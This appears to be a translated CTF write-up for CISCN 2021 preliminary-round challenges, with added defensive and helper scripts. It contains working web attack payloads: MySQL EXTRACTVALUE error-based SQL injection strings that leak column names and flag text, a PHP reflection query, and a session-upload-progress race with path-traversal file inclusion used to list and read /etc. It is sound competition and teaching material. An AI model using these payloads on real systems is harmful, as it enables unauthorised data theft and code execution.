[CISCN2021] Preliminary Round

easy_sql

Injection without known column names, combined with error-based injection

uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+

This leaks the column name: 1d004bae-a9e9-4f4e-8af1-c9518d464307

uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(select RIGHT(`column`,31) from flag)))--+

This returns the tail of the flag: ^rgiXT-97SMk-yiGwB-Ithem-Ozeer-}

The flag is fairly long (an EXTRACTVALUE error message only carries 32 characters, which is why RIGHT(...,31) is used), so pull the front part separately as well: CISCN{rgiXT-97SMk-yiGwB-Ithem-O

easy_source

A recycled challenge

This challenge tests the use of PHP's built-in classes; see ctfshow web100 for reference.

Use the reflection class, new ReflectionClass("ClassName"), to obtain information about a class:


/?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment


middle_source


<?php
    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    $fielf=$_POST["field"];   // the challenge source really reads $fielf, so $field is never assigned
    $cf="/tmp/app_auth/cfile/".$_POST['cf'];

    // whatever file $cf points at is executed as PHP, which is what the session-file trick relies on
    if(file_exists($cf)){
        include $cf;
        echo $$field;
        exit;
    }
    else{
        echo "";
        exit;
    }
?>

PHP_SESSION_UPLOAD_PROGRESS combined with a race condition to get a file include

See the ctfshow web 82-86 challenges I did earlier

There is a phpinfo here:

field=1&cf=../../../var/www/html/you_can_seeeeeeee_me.php

That gives the session directory: /var/lib/php/sessions/eciaadedie/

The POST form:


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- multipart upload carrying PHP_SESSION_UPLOAD_PROGRESS so PHP writes a session file -->
    <form action="http://114.116.248.145:24429/" method="POST" enctype="multipart/form-data">
        <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
        <input type="file" name="file" />
        <input type="submit" value="submit" />
    </form>
</body>
</html>

Use Burp to send a flood of requests that include the session file:

field=field&cf=../../../var/lib/php/sessions/eciaadedie/sess_flag&a=§1§

Since the session file's contents get included, we simply put a PHP code block in it that reads the directory.
Reading /etc: the hint says there is a strange folder, and eaijbefcfb is the strangest one.

  string(4) "dpkg"
  [25]=>
  string(10) "eaijbefcfb"
  [26]=>
  string(11) "environment"
  [27]=>

Keep walking deeper in the same way, and finally switch to file_get_contents() to read the file.
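A defender-side companion to the two web challenges above (easy_sql's EXTRACTVALUE error-based injection and middle_source's session.upload_progress file include), added here as an example and not part of the original writeup: it runs a few signature checks over constructed proxy-log records. The one-line "METHOD path body" record format, the rule names and the SAMPLE_LOG contents are assumptions of this example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Signatures for the two techniques in the writeup: MySQL XPath error-based
# extraction (plus the column-less join probe) and the session.upload_progress
# + path-traversal file include. Patterns run against URL-decoded records.
RULES = {
    "mysql-error-based-sqli": re.compile(
        r"(extractvalue|updatexml)\s*\(.*?(concat|0x5e|0x7e)", re.I | re.S),
    "columnless-join-probe": re.compile(r"\bjoin\b.+?\busing\s*\(", re.I | re.S),
    "session-upload-progress": re.compile(r"PHP_SESSION_UPLOAD_PROGRESS", re.I),
    "session-file-include": re.compile(r"(\.\./)+.*?/sessions?/.*?sess_", re.I | re.S),
}

def triage(record: str) -> List[str]:
    """Names of every rule that fires on one 'METHOD path body' record."""
    decoded = unquote_plus(record)
    return [name for name, rx in RULES.items() if rx.search(decoded)]

def triage_log(lines: List[str]) -> Dict[int, List[str]]:
    """1-based line number -> matched rules, only for lines that matched something."""
    hits: Dict[int, List[str]] = {}
    for n, line in enumerate(lines, 1):
        matched = triage(line)
        if matched:
            hits[n] = matched
    return hits

# Constructed sample records (not real traffic), shaped like the writeup's requests.
SAMPLE_LOG = [
    "POST / uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from "
    "(select * from flag as a join flag as b using(no,id))x)))--+",
    "POST / multipart/form-data name=PHP_SESSION_UPLOAD_PROGRESS value=123 file=x.txt",
    "POST / field=field&cf=../../../var/lib/php/sessions/sess_EXAMPLE&a=<?php echo 1; ?>",
    "GET /index.php?page=about",
    "POST / uname=alice&passwd=hunter2",
]

if __name__ == "__main__":
    for n, rules in triage_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(rules)}")
```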

robot

Install a RobotStudio plugin that can open the repag file.
It is a robotic arm.
We need to analyze the packet capture to work out what it wrote.

First start the simulation, then open the exe, and it turns out a connection can be made.
Try writing something: once connected, whatever is written, the arm writes along with it.
Let's capture packets, specifically the Bluetooth traffic.
Click around, grab a packet and see what it looks like,
then work out how to read its contents.
Following the stream, sure enough, we find the coordinates.
Save that data directly,
then use a script to extract all the coordinates:

import re

# Matches the [x,y,z] triples in the saved stream; z can be -10 (pen up), so allow a sign
COORD = re.compile(r'\[-?\d+,-?\d+,-?\d+\]')

coords = []
with open('1.txt', 'r') as file:
    for data in file:                      # iterating stops by itself at end of file
        found = COORD.findall(data)
        if found:
            print(found)
            coords += found                # keep everything for the next step

Since every stroke ends with a -10, split the data into segments on that marker.


Then draw a scatter plot:

# Import the required modules
import re
import matplotlib.pyplot as plt

# Pull every [x,y,z] triple out of the file; this works whether the file holds
# the quoted strings printed by the extraction script or a bare list of lists
COORD = re.compile(r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*,\s*(-?\d+)\s*\]')

with open('2.txt', 'r') as n:
    triples = COORD.findall(n.read())

x_value = []
y_value = []

for x, y, z in triples:
    x_value.append(int(x))
    y_value.append(int(y))
    if z == '-10':                 # z == -10 marks the end of a stroke
        plt.scatter(x_value, y_value)
        x_value = []
        y_value = []

if x_value:                        # plot a trailing stroke that has no terminator
    plt.scatter(x_value, y_value)

plt.savefig('flag.png')
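As an added example, not the writeup's own script: a reusable version of the extract-and-split step above that parses the [x,y,z] dump into strokes on the -10 pen-up marker and, going one step beyond the writeup, merges strokes whose bounding boxes overlap (the two bars of an X, say) into one box per glyph, so the characters can be counted and cropped before plotting. The SAMPLE_DUMP trace and the pen_up/pad parameter names are constructed for this example.

```python
import re
from typing import List, Tuple

Point = Tuple[int, int]
Box = Tuple[int, int, int, int]          # (min_x, min_y, max_x, max_y)

# [x,y,z] triples as they appear in the saved stream, with or without quotes around them
COORD = re.compile(r"\[\s*(-?\d+)\s*,\s*(-?\d+)\s*,\s*(-?\d+)\s*\]")

def parse_strokes(dump: str, pen_up: int = -10) -> List[List[Point]]:
    """Split the coordinate dump into strokes; a triple with z == pen_up closes a stroke."""
    strokes, current = [], []
    for x, y, z in COORD.findall(dump):
        current.append((int(x), int(y)))
        if int(z) == pen_up:
            strokes.append(current)
            current = []
    if current:                           # trailing stroke that never got a pen-up marker
        strokes.append(current)
    return strokes

def bounding_box(stroke: List[Point]) -> Box:
    xs, ys = [p[0] for p in stroke], [p[1] for p in stroke]
    return (min(xs), min(ys), max(xs), max(ys))

def overlaps(a: Box, b: Box, pad: int = 0) -> bool:
    """True when the two boxes touch or overlap on both axes (pad widens the test)."""
    return (a[0] <= b[2] + pad and b[0] <= a[2] + pad
            and a[1] <= b[3] + pad and b[1] <= a[3] + pad)

def group_glyphs(strokes: List[List[Point]], pad: int = 0) -> List[Box]:
    """Merge overlapping stroke boxes, left to right, into one box per glyph."""
    glyphs: List[Box] = []
    for box in sorted(bounding_box(s) for s in strokes):
        for i, g in enumerate(glyphs):
            if overlaps(box, g, pad):
                glyphs[i] = (min(g[0], box[0]), min(g[1], box[1]),
                             max(g[2], box[2]), max(g[3], box[3]))
                break
        else:
            glyphs.append(box)
    return glyphs

# Constructed sample: three strokes of a made-up trace, the last one missing its pen-up marker
SAMPLE_DUMP = (
    "'[10,10,0]', '[15,12,0]', '[20,20,-10]'\n"
    "'[18,14,0]', '[25,22,-10]'\n"
    "'[40,10,0]', '[50,20,0]'"
)

if __name__ == "__main__":
    strokes = parse_strokes(SAMPLE_DUMP)
    print(len(strokes), "strokes ->", len(group_glyphs(strokes)), "glyphs")
```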

MD5 the result and that is the flag.

隔空传话 (Talking Across the Air)

PDU encoding:
15030442
From the fifth row onward, everything that decodes is hexadecimal.
Sort by time, write the bytes into a file with 010 Editor, and you get an image:
CISCN{15030442_b586_4c9e_b436_26def12293e4}
